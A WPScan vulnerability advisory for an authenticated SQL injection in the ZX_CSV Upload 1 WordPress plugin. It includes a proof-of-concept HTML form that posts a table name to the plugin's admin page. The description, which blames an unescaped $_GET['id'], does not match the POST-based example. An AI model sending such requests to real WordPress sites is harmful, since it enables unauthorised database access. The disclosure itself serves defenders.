ZX_CSV Upload 1 – Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user access: admin user.

$_GET[‘id’] is not escaped. URL is accessible for every registered user.
Proof of Concept
1 – Login with admin user.

2 - Send request post:

<form action="http://www.example.com/wp-admin/admin.php?page=zx_csv_plugin_home" method="post">
    <input type="text" name="rsltsbmt" value="a">
    <input type="text" name="table_select" value="wp_terms">
    <input type="text" name="rsltfrom" value="0">
    <input type="text" name="rsltto" value="10">
    <input type="submit" name="">
</form>

Affects

Plugin zx-csv-upload

References

URL http://lenonleite.com.br/en/blog/2016/12/16/english-zx_csv-upload-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 72
Verified Yes
WPVDB ID 8702

Timeline

Publicly Published 2016-12-12 (3 months ago)
Added 2016-12-20 (3 months ago)
Last Updated 2016-12-20 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.